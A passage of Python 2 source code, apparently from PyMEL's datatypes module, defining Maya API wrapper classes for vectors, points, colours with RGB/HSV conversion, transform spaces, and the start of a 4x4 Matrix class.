self).__rmul__(other)\n if util.isNumeric(res):\n return res\n else:\n return self.__class__._convert(res)\n\n def __imul__(self, other):\n \"\"\" u.__imul__(v) <==> u *= v\n Valid for Vector * Matrix multiplication, in place transformation of u by Matrix v\n or Vector by scalar multiplication only \"\"\"\n try:\n return self.__class__(self.__mul__(other))\n except:\n return NotImplemented\n # special operators\n\n def __xor__(self, other):\n \"\"\" u.__xor__(v) <==> u^v\n Defines the cross product operator between two 3D vectors,\n if v is a MatrixN, u^v is equivalent to u.transformAsNormal(v) \"\"\"\n if isinstance(other, VectorN):\n return self.cross(other)\n elif isinstance(other, MatrixN):\n return self.transformAsNormal(other)\n else:\n return NotImplemented\n\n def __ixor__(self, other):\n \"\"\" u.__xor__(v) <==> u^=v\n Inplace cross product or transformation by inverse transpose of v is v is a MatrixN \"\"\"\n try:\n return self.__class__(self.__xor__(other))\n except:\n return NotImplemented\n\n # wrap of other API MVector methods, we use the api method if possible and delegate to Vector else\n\n def isEquivalent(self, other, tol=None):\n \"\"\" Returns true if both arguments considered as Vector are equal within the specified tolerance \"\"\"\n if tol is None:\n tol = _api.MVector_kTol\n try:\n nself, nother = coerce(self, other)\n except:\n return False\n if isinstance(nself, Vector):\n return bool(nself.apicls.isEquivalent(nself, nother, tol))\n else:\n return bool(super(Vector, nself).isEquivalent(nother, tol))\n\n def isParallel(self, other, tol=None):\n \"\"\" Returns true if both arguments considered as Vector are parallel within the specified tolerance \"\"\"\n if tol is None:\n tol = _api.MVector_kTol\n try:\n return bool(self.apicls.isParallel(Vector(self), Vector(other), tol))\n except:\n return super(Vector, self).isParallel(other, tol)\n\n def distanceTo(self, other):\n try:\n return self.apicls.distanceTo(Point(self), Point(other))\n except:\n return super(Vector, self).dist(other)\n\n def length(self):\n \"\"\" Return the length of the vector \"\"\"\n return Vector.apicls.length(Vector(self))\n\n def sqlength(self):\n \"\"\" Return the square length of the vector \"\"\"\n return self.dot(self)\n\n def normal(self):\n \"\"\" Return a normalized copy of self \"\"\"\n return self.__class__(Vector.apicls.normal(Vector(self)))\n\n def normalize(self):\n \"\"\" Performs an in place normalization of self \"\"\"\n if type(self) is Vector:\n Vector.apicls.normalize(self)\n else:\n self.assign(self.normal())\n\n # additional api methods that work on Vector only, and don't have an equivalent on VectorN\n\n def rotateTo(self, other):\n \"\"\" u.rotateTo(v) --> Quaternion\n Returns the Quaternion that represents the rotation of the Vector u into the Vector v\n around their mutually perpendicular axis. It amounts to rotate u by angle(u, v) around axis(u, v) \"\"\"\n if isinstance(other, Vector):\n return Quaternion(Vector.apicls.rotateTo(Vector(self), Vector(other)))\n else:\n raise TypeError, \"%r is not a Vector instance\" % other\n\n def rotateBy(self, *args):\n \"\"\" u.rotateBy(*args) --> Vector\n Returns the result of rotating u by the specified arguments.\n There are several ways the rotation can be specified:\n args is a tuple of one Matrix, TransformationMatrix, Quaternion, EulerRotation\n arg is tuple of 4 arguments, 3 rotation value and an optionnal rotation order\n args is a tuple of one Vector, the axis and one float, the angle to rotate around that axis in radians\"\"\"\n if args:\n if len(args) == 2 and isinstance(args[0], Vector):\n return self.__class__(self.apicls.rotateBy(self, Quaternion(Vector(args[0]), float(args[1]))))\n elif len(args) == 1 and isinstance(args[0], Matrix):\n return self.__class__(self.apicls.rotateBy(self, args[0].rotate))\n else:\n return self.__class__(self.apicls.rotateBy(self, EulerRotation(unit='radians', *args)))\n else:\n return self\n\n# def asUnit(self, unit) :\n# #kUnit = Distance.kUnit(unit)\n# return self.__class__( [ Distance(x).asUnit(unit) for x in self ] )\n#\n# def asUnit(self) :\n# return self.asUnit(self.unit)\n#\n# def asUIUnit()nits()self) :\n# return self.asUnit(Distance.getUIUnit())\n#\n# def asInternalUnit(self) :\n# return self.asUnit(Distance.getInternalUnit())\n#\n# def asMillimeter(self) :\n# return self.asUnit('millimeter')\n# def asCentimeters(self) :\n# return self.asUnit('centimeters')\n# def asKilometers(self) :\n# return self.asUnit('kilometers')\n# def asMeters(self) :\n# return self.asUnit('meters')\n#\n# def asInches(self) :\n# return self.asUnit('inches')\n# def asFeet(self) :\n# return self.asUnit('feet')\n# def asYards(self) :\n# return self.asUnit('yards')\n# def asMiles(self) :\n# return self.asUnit('miles')\n\n # additional api methods that work on Vector only, but can also be delegated to VectorN\n\n def transformAsNormal(self, other):\n \"\"\" Returns the vector transformed by the matrix as a normal\n Normal vectors are not transformed in the same way as position vectors or points.\n If this vector is treated as a normal vector then it needs to be transformed by\n post multiplying it by the inverse transpose of the transformation matrix.\n This method will apply the proper transformation to the vector as if it were a normal. \"\"\"\n if isinstance(other, Matrix):\n return self.__class__._convert(Vector.apicls.transformAsNormal(Vector(self), Matrix(other)))\n else:\n return self.__class__._convert(super(Vector, self).transformAsNormal(other))\n\n def dot(self, other):\n \"\"\" dot product of two vectors \"\"\"\n if isinstance(other, Vector):\n return Vector.apicls.__mul__(Vector(self), Vector(other))\n else:\n return super(Vector, self).dot(other)\n\n def cross(self, other):\n \"\"\" cross product, only defined for two 3D vectors \"\"\"\n if isinstance(other, Vector):\n return self.__class__._convert(Vector.apicls.__xor__(Vector(self), Vector(other)))\n else:\n return self.__class__._convert(super(Vector, self).cross(other))\n\n def axis(self, other, normalize=False):\n \"\"\" u.axis(v) <==> angle(u, v) --> Vector\n Returns the axis of rotation from u to v as the vector n = u ^ v\n if the normalize keyword argument is set to True, n is also normalized \"\"\"\n if isinstance(other, Vector):\n if normalize:\n return self.__class__._convert(Vector.apicls.__xor__(Vector(self), Vector(other)).normal())\n else:\n return self.__class__._convert(Vector.apicls.__xor__(Vector(self), Vector(other)))\n else:\n return self.__class__._convert(super(Vector, self).axis(other, normalize))\n\n def angle(self, other):\n \"\"\" u.angle(v) <==> angle(u, v) --> float\n Returns the angle (in radians) between the two vectors u and v\n Note that this angle is not signed, use axis to know the direction of the rotation \"\"\"\n if isinstance(other, Vector):\n return Vector.apicls.angle(Vector(self), Vector(other))\n else:\n return super(Vector, self).angle(other)\n\n # methods without an api equivalent\n\n # cotan on MVectors only takes 2 arguments\n def cotan(self, other):\n \"\"\" u.cotan(v) <==> cotan(u, v) --> float :\n cotangent of the a, b angle, a and b should be MVectors\"\"\"\n return VectorN.cotan(self, other)\n\n # rest derived from VectorN class\n\nclass FloatVector(Vector):\n\n \"\"\" A 3 dimensional vector class that wraps Maya's api FloatVector class,\n It behaves identically to Vector, but it also derives from api's FloatVector\n to keep api methods happy\n \"\"\"\n apicls = _api.MFloatVector\n\n# Point specific functions\n\ndef planar(p, *args, **kwargs):\n \"\"\" planar(p[, q, r, s (...), tol=tolerance]) --> bool\n Returns True if all provided MPoints are planar within given tolerance \"\"\"\n if not isinstance(p, Point):\n try:\n p = Point(p)\n except:\n raise TypeError, \"%s is not convertible to type Point, planar is only defined for n MPoints\" % (util.clsname(p))\n return p.planar(*args, **kwargs)\ndef center(p, *args):\n \"\"\" center(p[, q, r, s (...)]) --> Point\n Returns the Point that is the center of p, q, r, s (...) \"\"\"\n if not isinstance(p, Point):\n try:\n p = Point(p)\n except:\n raise TypeError, \"%s is not convertible to type Point, center is only defined for n MPoints\" % (util.clsname(p))\n return p.center(*args)\ndef bWeights(p, *args):\n \"\"\" bWeights(p[, p0, p1, (...), pn]) --> tuple\n Returns a tuple of (n0, n1, ...) normalized barycentric weights so that n0*p0 + n1*p1 + ... = p \"\"\"\n if not isinstance(p, Point):\n try:\n p = Point(p)\n except:\n raise TypeError, \"%s is not convertible to type Point, bWeights is only defined for n MPoints\" % (util.clsname(p))\n return p.bWeights(*args)\n\n\nclass Point(Vector):\n\n \"\"\" A 4 dimensional vector class that wraps Maya's api Point class,\n \"\"\"\n apicls = _api.MPoint\n cnames = ('x', 'y', 'z', 'w')\n shape = (4,)\n\n def __melobject__(self):\n \"\"\"Special method for returning a mel-friendly representation. In this case, a cartesian 3D point \"\"\"\n return self.cartesian()\n\n# # base methods are inherited from Vector\n\n # we only show the x, y, z components on an iter\n def __len__(self):\n l = len(self.data)\n if self.w == 1.0:\n l -= 1\n return l\n\n def __iter__(self, *args, **kwargs):\n \"\"\" Iterate on the api components \"\"\"\n l = len(self)\n for c in list(self.apicls.__iter__(self.data))[:l]:\n yield c\n\n # modified operators, when adding 2 Point consider second as Vector\n def __add__(self, other):\n \"\"\" u.__add__(v) <==> u+v\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n # prb with coerce when delegating to VectorN, either redefine coerce for Point or other fix\n # if isinstance(other, Point) :\n # other = Vector(other)\n try:\n other = Vector(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(Vector, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" u.__radd__(v) <==> v+u\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n if isinstance(other, Point):\n other = Vector(other)\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(Point, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" u.__iadd__(v) <==> u += v\n In place addition of u and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n # specific api methods\n def cartesianize(self):\n \"\"\" p.cartesianize() --> Point\n If the point instance p is of the form P(W*x, W*y, W*z, W), for some scale factor W != 0,\n then it is reset to be P(x, y, z, 1).\n This will only work correctly if the point is in homogenous form or cartesian form.\n If the point is in rational form, the results are not defined. \"\"\"\n return self.__class__(self.apicls.cartesianize(self))\n\n def cartesian(self):\n \"\"\" p.cartesian() --> Point\n Returns the cartesianized version of p, without changing p. \"\"\"\n t = copy.deepcopy(self)\n self.apicls.cartesianize(t)\n return t\n\n def rationalize(self):\n \"\"\" p.rationalize() --> Point\n If the point instance p is of the form P(W*x, W*y, W*z, W) (ie. is in homogenous or (for W==1) cartesian form),\n for some scale factor W != 0, then it is reset to be P(x, y, z, W).\n This will only work correctly if the point is in homogenous or cartesian form.\n If the point is already in rational form, the results are not defined. \"\"\"\n return self.__class__(self.apicls.rationalize(self))\n\n def rational(self):\n \"\"\" p.rational() --> Point\n Returns the rationalized version of p, without changing p. \"\"\"\n t = copy.deepcopy(self)\n self.apicls.rationalize(t)\n return t\n\n def homogenize(self):\n \"\"\" p.homogenize() --> Point\n If the point instance p is of the form P(x, y, z, W) (ie. is in rational or (for W==1) cartesian form),\n for some scale factor W != 0, then it is reset to be P(W*x, W*y, W*z, W). \"\"\"\n return self.__class__(self.apicls.homogenize(self))\n\n def homogen(self):\n \"\"\" p.homogen() --> Point\n Returns the homogenized version of p, without changing p. \"\"\"\n t = copy.deepcopy(self)\n self.apicls.homogenize(t)\n return t\n\n # additionnal methods\n\n def isEquivalent(self, other, tol=None):\n \"\"\" Returns true if both arguments considered as Point are equal within the specified tolerance \"\"\"\n if tol is None:\n tol = _api.MPoint_kTol\n try:\n nself, nother = coerce(self, other)\n except:\n return False\n if isinstance(nself, Point):\n return bool(nself.apicls.isEquivalent(nself, nother, tol))\n else:\n return bool(super(Point, nself).isEquivalent(nother, tol))\n\n def axis(self, start, end, normalize=False):\n \"\"\" a.axis(b, c) --> Vector\n Returns the axis of rotation from point b to c around a as the vector n = (b-a)^(c-a)\n if the normalize keyword argument is set to True, n is also normalized \"\"\"\n return Vector.axis(start - self, end - self, normalize=normalize)\n\n def angle(self, start, end):\n \"\"\" a.angle(b, c) --> float\n Returns the angle (in radians) of rotation from point b to c around a.\n Note that this angle is not signed, use axis to know the direction of the rotation \"\"\"\n return Vector.angle(start - self, end - self)\n\n def cotan(self, start, end):\n \"\"\" a.cotan(b, c) --> float :\n cotangent of the (b-a), (c-a) angle, a, b, and c should be MPoints representing points a, b, c\"\"\"\n return VectorN.cotan(start - self, end - self)\n\n def planar(self, *args, **kwargs):\n \"\"\" p.planar(q, r, s (...), tol=tolerance) --> bool\n Returns True if all provided points are planar within given tolerance \"\"\"\n if len(args) > 2:\n tol = kwargs.get('tol', None)\n n = (args[0] - self) ^ (args[1] - self)\n return reduce(operator.and_, map(lambda x: n.isParallel(x, tol), [(args[0] - self) ^ (a - self) for a in args[2:]]), True)\n else:\n return True\n\n def center(self, *args):\n \"\"\" p.center(q, r, s (...)) --> Point\n Returns the Point that is the center of p, q, r, s (...) \"\"\"\n return sum((self,) + args) / float(len(args) + 1)\n\n def bWeights(self, *args):\n \"\"\" p.bWeights(p0, p1, (...), pn) --> tuple\n Returns a tuple of (n0, n1, ...) normalized barycentric weights so that n0*p0 + n1*p1 + ... = p.\n This method works for n points defining a concave or convex n sided face,\n always returns positive normalized weights, and is continuous on the face limits (on the edges),\n but the n points must be coplanar, and p must be inside the face delimited by (p0, ..., pn) \"\"\"\n if args:\n p = self\n q = list(args)\n np = len(q)\n w = VectorN(0.0, size=np)\n weightSum = 0.0\n pOnEdge = False\n tol = _api.MPoint_kTol\n # all args should be MPoints\n for i in xrange(np):\n if not isinstance(q[i], Point):\n try:\n q[i] = Point(q[i])\n except:\n raise TypeError, \"cannot convert %s to Point, bWeights is defined for n MPoints\" % (util.clsname(q[i]))\n # if p sits on an edge, it' a limit case and there is an easy solution,\n # all weights are 0 but for the 2 edge end points\n for i in xrange(np):\n next = (i + 1) % np\n\n e = ((q[next] - q[i]) ^ (p - q[i])).sqlength()\n l = (q[next] - q[i]).sqlength()\n if e <= (tol * l):\n if l < tol:\n # p is on a 0 length edge, point and next point are on top of each other, as is p then\n w[i] = 0.5\n w[next] = 0.5\n else:\n # p is somewhere on that edge between point and next point\n di = (p - q[i]).length()\n w[next] = float(di / sqrt(l))\n w[i] = 1.0 - w[next]\n # in both case update the weights sum and mark p as being on an edge,\n # problem is solved\n weightSum += 1.0\n pOnEdge = True\n break\n # If p not on edge, use the cotangents method\n if not pOnEdge:\n for i in xrange(np):\n prev = (i + np - 1) % np\n next = (i + 1) % np\n\n lenSq = (p - q[i]).sqlength()\n w[i] = (q[i].cotan(p, q[prev]) + q[i].cotan(p, q[next])) / lenSq\n weightSum += w[i]\n\n # then normalize result\n if abs(weightSum):\n w /= weightSum\n else:\n raise ValueError, \"failed to compute bWeights for %s and %s.\\nThe point bWeights are computed for must be inside the planar face delimited by the n argument points\" % (self, args)\n\n return tuple(w)\n else:\n return ()\n\n\nclass FloatPoint(Point):\n\n \"\"\" A 4 dimensional vector class that wraps Maya's api FloatPoint class,\n It behaves identically to Point, but it also derives from api's FloatPoint\n to keep api methods happy\n \"\"\"\n apicls = _api.MFloatPoint\n\n\nclass Color(Vector):\n\n \"\"\" A 4 dimensional vector class that wraps Maya's api Color class,\n It stores the r, g, b, a components of the color, as normalized (Python) floats\n \"\"\"\n apicls = _api.MColor\n cnames = ('r', 'g', 'b', 'a')\n shape = (4,)\n # modes = ('rgb', 'hsv', 'cmy', 'cmyk')\n modes = ('rgb', 'hsv')\n\n # constants\n red = _api.MColor(1.0, 0.0, 0.0)\n green = _api.MColor(0.0, 1.0, 0.0)\n blue = _api.MColor(0.0, 0.0, 1.0)\n white = _api.MColor(1.0, 1.0, 1.0)\n black = _api.MColor(0.0, 0.0, 0.0)\n opaque = _api.MColor(0.0, 0.0, 0.0, 1.0)\n clear = _api.MColor(0.0, 0.0, 0.0, 0.0)\n\n # static methods\n @staticmethod\n def rgbtohsv(c):\n c = tuple(c)\n return tuple(colorsys.rgb_to_hsv(*clamp(c[:3])) + c[3:4])\n\n @staticmethod\n def hsvtorgb(c):\n c = tuple(c)\n # return colorsys.hsv_to_rgb(clamp(c[0]), clamp(c[1]), clamp(c[2]))\n return tuple(colorsys.hsv_to_rgb(*clamp(c[:3])) + c[3:4])\n\n # TODO : could define rgb and hsv iterators and allow __setitem__ and __getitem__ on these iterators\n # like (it's more simple) it's done in ArrayIter\n def _getrgba(self):\n return tuple(self)\n\n def _setrgba(self, value):\n if not hasattr(value, '__iter__'):\n # the way api interprets a single value\n # value = (None, None, None, value)\n value = (value,) * 4\n l = list(self)\n for i, v in enumerate(value[:4]):\n if v is not None:\n l[i] = float(v)\n self.assign(*l)\n rgba = property(_getrgba, _setrgba, None, \"The r,g,b,a Color components\"\"\")\n\n def _getrgb(self):\n return self.rgba[:3]\n\n def _setrgb(self, value):\n if not hasattr(value, '__iter__'):\n value = (value,) * 3\n self.rgba = value[:3]\n rgb = property(_getrgb, _setrgb, None, \"The r,g,b Color components\"\"\")\n\n def _gethsva(self):\n return tuple(Color.rgbtohsv(self))\n\n def _sethsva(self, value):\n if not hasattr(value, '__iter__'):\n # the way api interprets a single value\n # value = (None, None, None, value)\n value = (value,) * 4\n l = list(Color.rgbtohsv(self))\n for i, v in enumerate(value[:4]):\n if v is not None:\n l[i] = float(v)\n self.assign(*Color.hsvtorgb(self))\n hsva = property(_gethsva, _sethsva, None, \"The h,s,v,a Color components\"\"\")\n\n def _gethsv(self):\n return tuple(Color.rgbtohsv(self))[:3]\n\n def _sethsv(self, value):\n if not hasattr(value, '__iter__'):\n value = (value,) * 3\n self.hsva = value[:3]\n hsv = property(_gethsv, _sethsv, None, \"The h,s,v,a Color components\"\"\")\n\n def _geth(self):\n return self.hsva[0]\n\n def _seth(self, value):\n self.hsva = (value, None, None, None)\n h = property(_geth, _seth, None, \"The h Color component\"\"\")\n\n def _gets(self):\n return self.hsva[1]\n\n def _sets(self, value):\n self.hsva = (None, value, None, None)\n s = property(_gets, _sets, None, \"The s Color component\"\"\")\n\n def _getv(self):\n return self.hsva[2]\n\n def _setv(self, value):\n self.hsva = (None, None, value, None)\n v = property(_getv, _setv, None, \"The v Color component\"\"\")\n\n # __new__ is herited from Point/Vector, need to override __init__ to accept hsv mode though\n\n def __init__(self, *args, **kwargs):\n \"\"\" Init a Color instance\n Can pass one argument being another Color instance , or the color components \"\"\"\n cls = self.__class__\n mode = kwargs.get('mode', None)\n if mode is not None and mode not in cls.modes:\n raise ValueError, \"unknown mode %s for %s\" % (mode, util.clsname(self))\n # can also use the form =\n # for now supports only rgb and hsv flags\n hsvflag = {}\n rgbflag = {}\n for a in 'hsv':\n if a in kwargs:\n hsvflag[a] = kwargs[a]\n for a in 'rgb':\n if a in kwargs:\n rgbflag[a] = kwargs[a]\n # can't mix them\n if hsvflag and rgbflag:\n raise ValueError, \"can not mix r,g,b and h,s,v keyword arguments in a %s declaration\" % util.clsname(self)\n # if no mode specified, guess from what keyword arguments where used, else use 'rgb' as default\n if mode is None:\n if hsvflag:\n mode = 'hsv'\n else:\n mode = 'rgb'\n # can't specify a mode and use keywords of other modes\n if mode is not 'hsv' and hsvflag:\n raise ValueError, \"Can not use h,s,v keyword arguments while specifying %s mode in %s\" % (mode, util.clsname(self))\n elif mode is not 'rgb' and rgbflag:\n raise ValueError, \"Can not use r,g,b keyword arguments while specifying %s mode in %s\" % (mode, util.clsname(self))\n # NOTE: do not try to use mode with _api.Color, it seems bugged as of 2008\n #import colorsys\n #colorsys.rgb_to_hsv(0.0, 0.0, 1.0)\n ## Result: (0.66666666666666663, 1.0, 1.0) #\n #c = _api.Color(_api.Color.kHSV, 0.66666666666666663, 1.0, 1.0)\n # print \"# Result: \",c[0], c[1], c[2], c[3],\" #\"\n ## Result: 1.0 0.666666686535 1.0 1.0 #\n #c = _api.Color(_api.Color.kHSV, 0.66666666666666663*360, 1.0, 1.0)\n # print \"# Result: \",c[0], c[1], c[2], c[3],\" #\"\n ## Result: 1.0 240.0 1.0 1.0 #\n #colorsys.hsv_to_rgb(0.66666666666666663, 1.0, 1.0)\n ## Result: (0.0, 0.0, 1.0) #\n # we'll use Color only to store RGB values internally and do the conversion a read/write if desired\n # which I think make more sense anyway\n # quantize (255, 65535, no quantize means colors are 0.0-1.0 float values)\n # Initializing api's Color with int values seems also not to always behave so we quantize first and\n # use a float init always\n quantize = kwargs.get('quantize', None)\n if quantize is not None:\n try:\n quantize = float(quantize)\n except:\n raise ValueError, \"quantize must be a numeric value, not %s\" % (util.clsname(quantize))\n # can be initilized with a single argument (other Color, Vector, VectorN)\n if len(args) == 1:\n args = args[0]\n # we dont rely much on Color api as it doesn't seem totally finished, and do some things directly here\n if isinstance(args, self.__class__) or isinstance(args, self.apicls):\n # alternatively could be just ignored / output as warning\n if quantize:\n raise ValueError, \"Can not quantize a Color argument, a Color is always stored internally as float color\" % (mode, util.clsname(self))\n if mode == 'rgb':\n args = VectorN(args)\n elif mode == 'hsv':\n args = VectorN(cls.rgbtohsv(args))\n else:\n # single alpha value, as understood by api will break coerce behavior in operations\n # where other operand is a scalar\n # if not hasattr(args, '__iter__') :\n # args = VectorN(0.0, 0.0, 0.0, args)\n if hasattr(args, '__len__'):\n shape = (min(len(args), cls.size),)\n else:\n shape = cls.shape\n args = VectorN(args, shape=shape)\n # quantize if needed\n if quantize:\n args /= quantize\n # pad to a full Color size\n args.stack(self[len(args):])\n\n # apply keywords arguments, and convert if mode is not rgb\n if mode == 'rgb':\n if rgbflag:\n for i, a in enumerate('rgb'):\n if a in rgbflag:\n if quantize:\n args[i] = float(rgbflag[a]) / quantize\n else:\n args[i] = float(rgbflag[a])\n elif mode == 'hsv':\n if hsvflag:\n for i, a in enumerate('hsv'):\n if a in hsvflag:\n if quantize:\n args[i] = float(hsvflag[a]) / quantize\n else:\n args[i] = float(hsvflag[a])\n args = VectorN(cls.hsvtorgb(args))\n # finally alpha keyword\n a = kwargs.get('a', None)\n if a is not None:\n if quantize:\n args[-1] = float(a) / quantize\n else:\n args[-1] = float(a)\n\n try:\n self.assign(args)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", mode, args))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (util.clsname(self), msg, util.clsname(self))\n\n def __melobject__(self):\n \"\"\"Special method for returning a mel-friendly representation. In this case, a 3-component color (RGB) \"\"\"\n return [self.r, self.g, self.b]\n\n # overriden operators\n\n # defined for two MColors only\n def __add__(self, other):\n \"\"\" c.__add__(d) <==> c+d\n Returns the result of the addition of MColors c and d if d is convertible to a Color,\n adds d to every component of c if d is a scalar \"\"\"\n # prb with coerce when delegating to VectorN, either redefine coerce for Point or other fix\n # if isinstance(other, Point) :\n # other = Vector(other)\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(Vector, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" c.__radd__(d) <==> d+c\n Returns the result of the addition of MColors c and d if d is convertible to a Color,\n adds d to every component of c if d is a scalar \"\"\"\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(Point, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" c.__iadd__(d) <==> c += d\n In place addition of c and d, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" c.__add__(d) <==> c+d\n Returns the result of the substraction of Color d from c if d is convertible to a Color,\n substract d from every component of c if d is a scalar \"\"\"\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except:\n return self.__class__._convert(super(Vector, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" c.__rsub__(d) <==> d-c\n Returns the result of the substraction of Color c from d if d is convertible to a Color,\n replace every component c[i] of c by d-c[i] if d is a scalar \"\"\"\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except:\n return self.__class__._convert(super(Point, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" c.__isub__(d) <==> c -= d\n In place substraction of d from c, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except:\n return NotImplemented\n # action depends on second object type\n # TODO : would be nice to define LUT classes and allow MColor * LUT transform\n # overloaded operators\n\n def __mul__(self, other):\n \"\"\" a.__mul__(b) <==> a*b\n If b is a 1D sequence (Array, VectorN, Color), __mul__ is mapped to element-wise multiplication,\n If b is a MatrixN, __mul__ is similar to Point a by MatrixN b multiplication (post multiplication or transformation of a by b),\n multiplies every component of a by b if b is a single numeric value \"\"\"\n if isinstance(other, MatrixN):\n # will defer to MatrixN rmul\n return NotImplemented\n else:\n # will defer to Array.__mul__\n return Array.__mul__(self, other)\n\n def __rmul__(self, other):\n \"\"\" a.__rmul__(b) <==> b*a\n If b is a 1D sequence (Array, VectorN, Color), __mul__ is mapped to element-wise multiplication,\n If b is a MatrixN, __mul__ is similar to MatrixN b by Point a matrix multiplication,\n multiplies every component of a by b if b is a single numeric value \"\"\"\n if isinstance(other, MatrixN):\n # will defer to MatrixN mul\n return NotImplemented\n else:\n # will defer to Array.__rmul__\n return Array.__rmul__(self, other)\n\n def __imul__(self, other):\n \"\"\" a.__imul__(b) <==> a *= b\n In place multiplication of VectorN a and b, see __mul__, result must fit a's type \"\"\"\n res = self * other\n if isinstance(res, self.__class__):\n return self.__class__(res)\n else:\n raise TypeError, \"result of in place multiplication of %s by %s is not a %s\" % (clsname(self), clsname(other), clsname(self))\n\n # additionnal methods, to be extended\n def over(self, other):\n \"\"\" c1.over(c2): Composites c1 over other c2 using c1's alpha, the resulting color has the alpha of c2 \"\"\"\n if isinstance(other, Color):\n a = self.a\n return Color(Vector(other).blend(Vector(self), self.a), a=other.a)\n else:\n raise TypeError, \"over is defined for Color instances, not %s\" % (util.clsname(other))\n # return Vector instead ? Keeping alpha doesn't make much sense\n\n def premult(self):\n \"\"\" Premultiply Color r, g and b by it's alpha and resets alpha to 1.0 \"\"\"\n return self.__class__(Vector(self) * self.a)\n\n def gamma(self, g):\n \"\"\" c.gamma(g) applies gamma correction g to Color c, g can be a scalar and then will be applied to r, g, b\n or an iterable of up to 3 (r, g, b) independant gamma correction values \"\"\"\n if not hasattr(g, '__iter__'):\n g = (g,) * 3 + (1.0,)\n else:\n g = g[:3] + (1.0,) * (4 - len(g[:3]))\n return gamma(self, g)\n\n def hsvblend(self, other, weight=0.5):\n \"\"\" c1.hsvblend(c2) --> Color\n Returns the result of blending c1 with c2 in hsv space, using the given weight \"\"\"\n c1 = list(self.hsva)\n c2 = list(other.hsva)\n if abs(c2[0] - c1[0]) >= 0.5:\n if abs(c2[0] - c1[0]) == 0.5:\n c1[1], c2[1] = 0.0, 0.0\n if c1[0] > 0.5:\n c1[0] -= 1.0\n if c2[0] > 0.5:\n c2[0] -= 1.0\n c = blend(c1, c2, weight=weight)\n if c[0] < 0.0:\n c[0] += 1.0\n return self.__class__(c, mode='hsv')\n\n\n# to specify space of transforms\n\nclass Space(_api.MSpace):\n apicls = _api.MSpace\n __metaclass__ = _factories.MetaMayaTypeWrapper\n pass\n\nSpaces = Space.Space\n\ndef equivalentSpace(space1, space2, rotationOnly=False):\n '''Compare the two given space values to see if they are equal\n\n Parameters\n ----------\n space1 : int or str\n the first space to compare (may be either the integer enum value, or the\n api enum name - ie, \"kPostTransform\" - or the pymel enum name - ie,\n \"postTransform\" )\n space2 : int or str\n the seoncd space to compare (may be either the integer enum value, or\n the api enum name - ie, \"kPostTransform\" - or the pymel enum name - ie,\n \"postTransform\")\n rotationOnly : bool\n If true, then compare the spaces, assuming we are only considering\n rotation - in rotation, transform is the same as preTransform/object\n (the reason being that in maya, preTransform means rotation +\n translation are both defined in the preTransform/object coordinate\n system, while transform means rotation is defined in preTransform/object\n coordinates, while translate is given in the postTransform space...\n which matches the way maya applies transforms)\n '''\n translated = []\n for space in space1, space2:\n space = _factories.ApiArgUtil.castInputEnum('MSpace', 'Space', space)\n if rotationOnly:\n # for the purposes of rotations, maya treats transform and\n # preTransform/object as the same (the reason being that in maya,\n # preTransform means both rotation + translation are both defined in\n # the preTransform/object coordinate system, while transform means\n # rotation is defined in preTransform/object coordinates, while\n # translate is given in the postTransform space... which matches the\n # way maya applies transforms)\n if space == _api.MSpace.kTransform:\n space = _api.MSpace.kPreTransform\n translated.append(space)\n\n\n# kInvalid\n# kTransform\n# Transform matrix (relative) space\n# kPreTransform\n# Pre-transform matrix (geometry)\n# kPostTransform\n# Post-transform matrix (world) space\n# kWorld\n# transform in world space\n# kObject\n# Same as pre-transform space\n# kLast\n\n# sadly TransformationMatrix.RotationOrder and EulerRotation.RotationOrder don't match\n\n# class MRotationOrder(int):\n# pass\n\n# kInvalid\n# kXYZ\n# kYZX\n# kZXY\n# kXZY\n# kYXZ\n# kZYX\n# kLast\n\n\n# kXYZ\n# kYZX\n# kZXY\n# kXZY\n# kYXZ\n# kZYX\n\n# functions that work on MatrixN (det(), inv(), ...) herited from arrays\n# and properly defer to the class methods\n\n# For row, column order, see the definition of a TransformationMatrix in docs :\n# T = | 1 0 0 0 |\n# | 0 1 0 0 |\n# | 0 0 1 0 |\n# | tx ty tz 1 |\n# and m(r, c) should return value of cell at r row and c column :\n# t = _api.TransformationMatrix()\n# t.setTranslation(_api.Vector(1, 2, 3), _api.MSpace.kWorld)\n# m = t.asMatrix()\n# mm(3,0)\n# 1.0\n# mm(3,1)\n# 2.0\n# mm(3,2)\n# 3.0\n\nclass Matrix(MatrixN):\n\n \"\"\"\n A 4x4 transformation matrix based on api Matrix\n\n >>> from pymel.all import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> i = dt.Matrix()\n >>> print i.formated()\n [[1.0, 0.0, 0.0, 0.0],\n [0.0, 1.0, 0.0, 0.0],\n [0.0, 0.0, 1.0, 0.0],\n [0.0, 0.0, 0.0, 1.0]]\n\n >>> v = dt.Matrix(1, 2, 3)\n >>> print v.formated()\n [[1.0, 2.0, 3.0, 0.0],\n [1.0, 2.0, 3.0, 0.0],\n [1.0, 2.0, 3.0, 0.0],\n [1.0, 2.0, 3.0, 0.0]]\n\n\n \"\"\"\n 